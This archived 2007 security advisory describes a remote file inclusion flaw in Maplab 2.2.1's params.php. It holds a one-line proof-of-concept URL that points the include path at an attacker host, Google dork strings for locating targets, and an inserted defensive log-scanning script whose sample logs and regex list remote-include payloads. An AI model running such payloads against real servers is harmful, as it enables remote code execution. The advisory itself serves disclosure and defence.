SECURITYVULNS:DOC:16548
Apr 03, 2007 - 12:00 a.m.

Maplab <= 2.2.1 (gszAppPath) Remote File Inclusion Vulnerability

Source: vulners.com

Author : Mufti Rizal a.k.a mbahngarso
Date : March, 30th 2007
Location : Jakarta, Indonesia
Web : http://acak2an.blogspot.com
Critical Lvl : Dangerous
Impact : System access
Where : From Remote

Affected software description:

Application   : Maplab
Version       : 2.2.1
Vendor        : http://maptools.org
Description   : A suite of web-based tools that simplifies the creation and management of MapServer maps and Web mapping applications

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~
- Invalid include function at gmapfactory/params.php:

/* =========================gmapfactory/params.php==========================
 * Re-build the phtml file
 * ========================================================================= */
include_once($gszAppPath."htdocs/gmapfactory/build_phtml.php");

...
----------------------------------------------------------------

Input passed to the "gszAppPath" parameter in params.php is not
properly verified before being used in include_once(). Because the
variable is not set by the script itself, a request parameter of the
same name populates it when register_globals is enabled. This can be
exploited to execute arbitrary PHP code by including files from local
or external resources.
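As an added defensive example (not part of the advisory), the following Python script scans web-server access-log lines for requests that hand gmapfactory/params.php a gszAppPath value, which is the precondition for this bug, and labels why each value is suspicious. The log lines, IP addresses and log format are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (Apache common log format); not taken from the advisory.
SAMPLE_LOG = """\
203.0.113.5 - - [30/Mar/2007:10:01:02 +0700] "GET /maplab/htdocs/gmapfactory/params.php?gszAppPath=http://203.0.113.9/x? HTTP/1.1" 200 512
203.0.113.6 - - [30/Mar/2007:10:02:11 +0700] "GET /maplab/htdocs/gmapfactory/params.php?map=demo HTTP/1.1" 200 2048
203.0.113.7 - - [30/Mar/2007:10:03:40 +0700] "GET /maplab/htdocs/gmapfactory/params.php?gszAppPath=%2Fvar%2Fwww%2Fmaplab%2F HTTP/1.1" 200 512
203.0.113.8 - - [30/Mar/2007:10:04:01 +0700] "GET /maplab/htdocs/gmapfactory/params.php?gszAppPath=..%2F..%2F..%2Fetc%2F HTTP/1.1" 200 512
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# URL schemes and PHP stream wrappers that make include_once() read code from outside the install tree.
REMOTE_SCHEME = re.compile(r'^(https?|ftps?|php|data|expect|phar)://', re.I)

def classify_path(value: str) -> str:
    """Explain why a client-supplied gszAppPath value is suspicious.

    The application is meant to set gszAppPath itself, so any request carrying
    the parameter is unexpected; the category only ranks how bad the value is.
    A second unquote() pass catches double-encoded values.
    """
    v = unquote(value).strip()
    if REMOTE_SCHEME.match(v):
        return "remote include (URL or stream wrapper)"
    if ".." in v.replace("\\", "/").split("/"):
        return "directory traversal"
    return "client-supplied include path"

def find_rfi_attempts(log_text: str) -> list:
    """Return (ip, reason, value) for each request to params.php that sets gszAppPath."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we can parse
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/gmapfactory/params.php"):
            continue
        # keep_blank_values so an empty gszAppPath= is still reported
        params = parse_qs(parts.query, keep_blank_values=True)
        for raw in params.get("gszAppPath", []):
            hits.append((m.group("ip"), classify_path(raw), raw))
    return hits

if __name__ == "__main__":
    for ip, reason, value in find_rfi_attempts(SAMPLE_LOG):
        print(f"{ip}: {reason}: {value}")
```

Because register_globals also populates variables from POST bodies and cookies, this only sees attempts carried in the query string. The source fix in the Solution section is what actually closes the hole.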




Poc/Exploit:
~~~~~~~~~
http://www.target.com/[maplab_path]/maplab/htdocs/gmapfactory/params.php?gszAppPath=http://attacker.com/setan?



google d0rk:
~~~~~~~
"allinurl:/gmapfactory" or "allinurl:/maplab"



Solution:
~~~~~~

- Edit the source code to ensure that input is properly verified: set $gszAppPath from the application's own configuration before it is used in include_once(), rather than leaving it to be supplied by the request.
- Turn off register_globals


---------------------------------------------------------------------------

Shoutz:
~~~~
~ K-159, the_day, etc
~ Underground Community.

---------------------------------------------------------------------------
Contact:
~~~~~
     mbahngarso ||  mufti.rizal@gmail.com
     Homepage : http://acak2an.blogspot.com
-------------------------------- [ EOF ] ----------------------------------